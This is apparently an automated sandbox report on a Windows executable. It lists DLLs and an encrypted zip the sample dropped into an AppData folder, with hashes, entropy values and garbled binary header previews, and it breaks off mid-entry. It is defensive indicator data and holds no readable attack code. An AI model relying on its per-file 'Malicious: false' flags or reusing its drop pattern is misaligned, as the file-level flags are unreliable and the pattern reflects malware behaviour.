Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-convert-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22328
Entropy (8bit):	6.929204936143068
Encrypted:	false
SSDEEP:	384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
MD5:	72E28C902CD947F9A3425B19AC5A64BD
SHA1:	9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
SHA-256:	3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
SHA-512:	58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-environment-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18736
Entropy (8bit):	7.078409479204304
Encrypted:	false
SSDEEP:	192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
MD5:	AC290DAD7CB4CA2D93516580452EDA1C
SHA1:	FA949453557D0049D723F9615E4F390010520EDA
SHA-256:	C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
SHA-512:	B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-filesystem-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20280
Entropy (8bit):	7.085387497246545
Encrypted:	false
SSDEEP:	384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
MD5:	AEC2268601470050E62CB8066DD41A59
SHA1:	363ED259905442C4E3B89901BFD8A43B96BF25E4
SHA-256:	7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
SHA-512:	0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-heap-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.060393359865728
Encrypted:	false
SSDEEP:	192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
MD5:	93D3DA06BF894F4FA21007BEE06B5E7D
SHA1:	1E47230A7EBCFAF643087A1929A385E0D554AD15
SHA-256:	F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
SHA-512:	72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...J.o ...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................J.o ........7...d...d.......J.o ........d...............J.o ....................RSDSq.........pkQX[....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........J.o ....6...............(...........c...................S.......................1...V...y.......................<...c...........................U...z...............:...u...................&...E...p.......................,...U...

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-locale-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.13172731865352
Encrypted:	false
SSDEEP:	192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
MD5:	A2F2258C32E3BA9ABF9E9E38EF7DA8C9
SHA1:	116846CA871114B7C54148AB2D968F364DA6142F
SHA-256:	565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
SHA-512:	E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\|..O...........!......................... ...............................0......E*....@.............................e............ ..................8=..............T............................................................................text...u........................... ..`.rsrc........ ......................@..@v...................\|..O........9...d...d.......\|..O........d...............\|..O....................RSDS.X...7.......$k....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg.......e....edata... ..`....rsrc$01....` .......rsrc$02....................\|..O....................8...........5...h...............E...................$...N...t...................$...D...b...!...R............... ...s...................:...k.......................9...X...................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-math-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28984
Entropy (8bit):	6.6686462438397
Encrypted:	false
SSDEEP:	384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
MD5:	8B0BA750E7B15300482CE6C961A932F0
SHA1:	71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
SHA-256:	BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
SHA-512:	FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................@...............................P............@..............................+...........@...............4..8=..............T............................................................................text....,.......................... ..`.rsrc........@.......0..............@..@v...............................7...d...d...................d.......................................RSDSB...=........,....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg........+...edata...@..`....rsrc$01....`@.......rsrc$02................l.......:...:...(...................................(...@...X...q...............................4...M...g........................ ..= ..i ... ... ... ...!..E!..o!...!...!...!..."..F"..s"..."..."..."...#..E#..o#...#...#..

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-multibyte-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26424
Entropy (8bit):	6.712286643697659
Encrypted:	false
SSDEEP:	384:kDy+Kr6aLPmIHJI6/CpG3t2G3t4odXL5WPhWFY0i00GftpBjbnMxem8hzlmTMiLV:kDZKrZPmIHJI64GoiZMxe0V
MD5:	35FC66BD813D0F126883E695664E7B83
SHA1:	2FD63C18CC5DC4DEFC7EA82F421050E668F68548
SHA-256:	66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
SHA-512:	65F8397DE5C48D3DF8AD79BAF46C1D3A0761F727E918AE63612EA37D96ADF16CC76D70D454A599F37F9BA9B4E2E38EBC845DF4C74FC1E1131720FD0DCB881431
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u'............!.....$...................@...............................P............@.............................. ...........@...............*..8=..............T............................................................................text....".......$.................. ..`.rsrc........@.......&..............@..@v....................u'.........<...d...d........u'.........d................u'.....................RSDS7.%..5..+...+.....api-ms-win-crt-multibyte-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg........ ...edata...@..`....rsrc$01....`@.......rsrc$02.....................u'.....................8...X...x...;...`.......................1...T...w...................'...L...q.......................B...e.......................7...Z...}...................+...L...m.......................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-private-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73016
Entropy (8bit):	5.838702055399663
Encrypted:	false
SSDEEP:	1536:VAHEGlVDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPFZo6kt:Vc7De5c4bFE2Jy2cvxXWpD9d3334BkZj
MD5:	9910A1BFDC41C5B39F6AF37F0A22AACD
SHA1:	47FA76778556F34A5E7910C816C78835109E4050
SHA-256:	65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
SHA-512:	A9788D0F8B3F61235EF4740724B4A0D8C0D3CF51F851C367CC9779AB07F208864A7F1B4A44255E0DE8E030D84B63B1BDB58F12C8C20455FF6A55EF6207B31A91
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....^1...........!................................................................R.....@.............................................................8=..............T............................................................................text............................... ..`.rsrc...............................@..@v.....................^1........:...d...d.........^1........d.................^1....................RSDS.J..w/.8..bu..3.....api-ms-win-crt-private-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata......`....rsrc$01....`........rsrc$02......................^1.....>..............8...h#...5...>...?..7?.._?...?...?...?...@..V@...@...@...@..+A..\A...A...A...A...B..LB...B...B...C..HC...C...C...C...C...D..HD...D...D...E..eE...E...E...F..1F..gF...F...F...G..BG..uG...G..

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-process-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.076072254895036
Encrypted:	false
SSDEEP:	192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
MD5:	8D02DD4C29BD490E672D271700511371
SHA1:	F3035A756E2E963764912C6B432E74615AE07011
SHA-256:	C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
SHA-512:	D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...l.h............!......................... ...............................0.......U....@.............................x............ ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................l.h.........:...d...d.......l.h.........d...............l.h.....................RSDSZ\.qM..I....3.....api-ms-win-crt-process-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......x....edata... ..`....rsrc$01....` .......rsrc$02....................l.h.............$...$...8.......X...................&...@...Y...q...........................*...E..._...z.......................!...<...V...q...........................9...V...t.......................7...R...i...

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-runtime-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22840
Entropy (8bit):	6.942029615075195
Encrypted:	false
SSDEEP:	384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
MD5:	41A348F9BEDC8681FB30FA78E45EDB24
SHA1:	66E76C0574A549F293323DD6F863A8A5B54F3F9B
SHA-256:	C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
SHA-512:	8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....L............!.........................0...............................@.......i....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v.....................L.........:...d...d.........L.........d.................L.....................RSDS6..>[d.=. ....C....api-ms-win-crt-runtime-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02......................L.....f.......k...k...8...............................4...S...s.......................E...g.......................)...N...n...................&...E...f...................'...D...j.......................>.......

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-stdio-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24368
Entropy (8bit):	6.873960147000383
Encrypted:	false
SSDEEP:	384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
MD5:	FEFB98394CB9EF4368DA798DEAB00E21
SHA1:	316D86926B558C9F3F6133739C1A8477B9E60740
SHA-256:	B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
SHA-512:	57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................0...............................@.......)....@.............................a............0..............."..0=..............T............................................................................text...a........................... ..`.rsrc........0......................@..@v...............................8...d...d...................d.......................................RSDS...iS#.hg.....j....api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02................^...............(....... ...................<...y...........)...h........... ...]...............H...............)...D...^...v...............................T...u.......................9...Z...{...................0...Q...

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-string-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	23488
Entropy (8bit):	6.840671293766487
Encrypted:	false
SSDEEP:	384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
MD5:	404604CD100A1E60DFDAF6ECF5BA14C0
SHA1:	58469835AB4B916927B3CABF54AEE4F380FF6748
SHA-256:	73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
SHA-512:	DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......S...........!.........................0...............................@......B.....@..........................................0..............."...9..............T............................................................................text............................... ..`.rsrc........0......................@..@v......................S........9...d...d..........S........d..................S....................RSDSI.......$[~f..5....api-ms-win-crt-string-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................S....,...............8...........W...s.......................#...B...a...........................<...[...z.......................;...[...{................... ...A...b...........................<...X...r.......

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-time-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20792
Entropy (8bit):	7.018061005886957
Encrypted:	false
SSDEEP:	384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
MD5:	849F2C3EBF1FCBA33D16153692D5810F
SHA1:	1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
SHA-256:	69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
SHA-512:	44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....OI...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v....................OI........7...d...d........OI........d................OI....................RSDS...s..,E.w.9I..D....api-ms-win-crt-time-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.........OI............H...H...(...H...h... ...=...\...z.......................8...V...s.......................&...D...a...~.......................?...b.......................!...F...k.......................0...N...k...................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-utility-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.127951145819804
Encrypted:	false
SSDEEP:	192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
MD5:	B52A0CA52C9C207874639B62B6082242
SHA1:	6FB845D6A82102FF74BD35F42A2844D8C450413B
SHA-256:	A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
SHA-512:	18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....!5............!......................... ...............................0.......4....@.............................^............ ..................8=..............T............................................................................text...n........................... ..`.rsrc........ ......................@..@v....................!5.........:...d...d........!5.........d................!5.....................RSDS............k.....api-ms-win-crt-utility-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02.....................!5.....d...............8.......(...................#...<...U...l...............................+...@...[...r...................................4...I..._.......................3...N...e...\|.......................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\breakpadinjector.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	117712
Entropy (8bit):	6.598338256653691
Encrypted:	false
SSDEEP:	3072:9b9ffsTV5n8cSQQtys6FXCVnx+IMD6eN07e:P25V/QQs6WTMex7e
MD5:	A436472B0A7B2EB2C4F53FDF512D0CF8
SHA1:	963FE8AE9EC8819EF2A674DBF7C6A92DBB6B46A9
SHA-256:	87ED943D2F06D9CA8824789405B412E770FE84454950EC7E96105F756D858E52
SHA-512:	89918673ADDC0501746F24EC9A609AC4D416A4316B27BF225974E898891699B630BB18DB32432DA2F058DC11D9AF7BAF95D067B29FB39052EE7C6F622718271B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s..y7.{7.{7.{..x+>.{..~+I.{...+%.{.x+$.{..+'.{.~+..{..z+4.{7.zA.{..~+>.{..{+6.{...6.{..y+6.{Rich7.{........PE..L....@.\.........."!................t........0.......................................S....@.........................P...P.......(...................................`...T...............................@............0..D............................text............................... ..`.rdata...l...0...n... ..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\freebl3.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	334288
Entropy (8bit):	6.808908775107082
Encrypted:	false
SSDEEP:	6144:6cYBCU/bEPU6Rc5xUqc+z75nv4F0GHrIraqqDL6XPSed:67WRCB7zl4F0I4qn6R
MD5:	60ACD24430204AD2DC7F148B8CFE9BDC
SHA1:	989F377B9117D7CB21CBE92A4117F88F9C7693D9
SHA-256:	9876C53134DBBEC4DCCA67581F53638EBA3FEA3A15491AA3CF2526B71032DA97
SHA-512:	626C36E9567F57FA8EC9C36D96CBADEDE9C6F6734A7305ECFB9F798952BBACDFA33A1B6C4999BA5B78897DC2EC6F91870F7EC25B2CEACBAEE4BE942FE881DB01
Malicious:	false
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....@.\.........."!.........f...............................................p............@.........................p...P............@..x....................P......0...T...............................@...............8............................text...d........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\kE9gS2wR6.zip Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	2828315
Entropy (8bit):	7.998625956067725
Encrypted:	true
SSDEEP:	49152:tiGLaX5/cgbRETlc0EqgSVAx07XZiEi4qiefeEJGt5ygL0+6/qax:t9OX9alwJSVP1fnefekGt5CP
MD5:	1117CD347D09C43C1F2079439056ADA3
SHA1:	93C2CE5FC4924314318554E131CFBCD119F01AB6
SHA-256:	4CFADA7EB51A6C0CB26283F9C86784B2B2587C59C46A5D3DC0F06CAD2C55EE97
SHA-512:	FC3F85B50176C0F96898B7D744370E2FF0AA2024203B936EB1465304C1C7A56E1AC078F3FDF751F4384536602F997E745BFFF97F1D8FF2288526883185C08FAF
Malicious:	false
Preview:	PK.........znN<..{r....i......nssdbm3.dll...\|...8...N..Y..6.$J.....$1...D .a.....jL.V..C...N.;....}./............$...Z,T.R.qc...Ec.=................;..{..s....p.`..A.?M.....W!.....a..?N...~e.A..W.o.....[.}...,...;.+\....Jw.\|...k.......<yR.^.E.o.nxs.c...=V....,..F....cu.....w.O..[..u.{..<.w....7P...{..K~..E..w...c...z^..[Z....6.G.V.2..+.n4......1M.......w{f..nJL..{. d......M..+.. ......./.)..$X!......L..K.`.M...w.I..LA8r.IX...r...87..}........<.].r.....TWm......b6/._....a..W.lB...3.n.._...j....o.Mz.._Q........8....K............gr..L..H...v....6[...4I...{.1g..<..>M..$G.&Y........-.....O..9\...,t..W.m.X ..Y.3....S<#}.".>.0RBg,...lh.s..o.....r.p8...)..3..K.v....ds.n3.+]....+....krMu._.Y\..../8T......&.BC.".u..;..e.k u$......~`.{.!.M...\W.Y.37+nQ.Z.*...3\G..5d....Z.hVL..Z.\|k.5...XF.Y..lVVW..C..\|.....b..\.Z...m. ..0...P.F8{].U.p..RW,n...MM.....s..._@..>Q.. ...N.>.T?WM....)9B.............mVW.......b.6{..\|!......O....M....>.>.$\.%..L.zF.l...3

C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldap60.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	132048
Entropy (8bit):	6.627391684128337
Encrypted:	false
SSDEEP:	3072:qgXCFTvwqiiynFa6zqeqQZ06DdEH4sq9gHNaIkIQhEwe:qdvwqMFbOePIP/zkIQ2h
MD5:	5A49EBF1DA3D5971B62A4FD295A71ECF
SHA1:	40917474EF7914126D62BA7CDBF6CF54D227AA20
SHA-256:	2B128B3702F8509F35CAD0D657C9A00F0487B93D70336DF229F8588FBA6BA926
SHA-512:	A6123BA3BCF9DE6AA8CE09F2F84D6D3C79B0586F9E2FD0C8A6C3246A91098099B64EDC2F5D7E7007D24048F10AE9FC30CCF7779171F3FD03919807EE6AF76809
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q...?S..?S..?S..S..?S\|.>R..?S;..S..?S\|.<R..?S\|.:R..?S\|.;R..?S..>R..?S..>S..?Sn.;R.?Sn.?R..?Sn..S..?Sn.=R..?SRich..?S........................PE..L....@.\.........."!.........f...... ........................................0............@.............................................x.................... ......p...T..............................@...............\............................text...:........................... ..`.rdata...@.......B..................@..@.data...l...........................@....rsrc...x...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldif60.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20432
Entropy (8bit):	6.337521751154348
Encrypted:	false
SSDEEP:	384:YxfML3ALxK0AZEuzOJKRsIFYvDG8A3OPLonw4S:0fMmxFyO4RpGDG8MjS
MD5:	4FE544DFC7CDAA026DA6EDA09CAD66C4
SHA1:	85D21E5F5F72A4808F02F4EA14AA65154E52CE99
SHA-256:	3AABBE0AA86CE8A91E5C49B7DE577AF73B9889D7F03AF919F17F3F315A879B0F
SHA-512:	5C78C5482E589AF7D609318A6705824FD504136AEAAC63F373E913DA85FA03AF868669534496217B05D74364A165D7E08899437FCC0E3017F02D94858BA814BB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9..j..j..j...j..j^..k..j^..k..j^..k..j^..k..j...k..j..j..jL..k..jL..k..jL.bj..jL..k..jRich..j........................PE..L....<.\.........."!................Y........0...............................p......r.....@..........................5.......6.......P..x............2.......`..x....0..T...........................(1..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc...x....P.......,..............@..@.reloc..x....`.......0..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\lgpllibs.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	55760
Entropy (8bit):	6.738700405402967
Encrypted:	false
SSDEEP:	1536:LxsBS3Q6j+37mWT7DT/GszGrn7iBCmjFCOu:LxTBcmWT7X/Gszen7icmjFtu
MD5:	56E982D4C380C9CD24852564A8C02C3E
SHA1:	F9031327208176059CD03F53C8C5934C1050897F
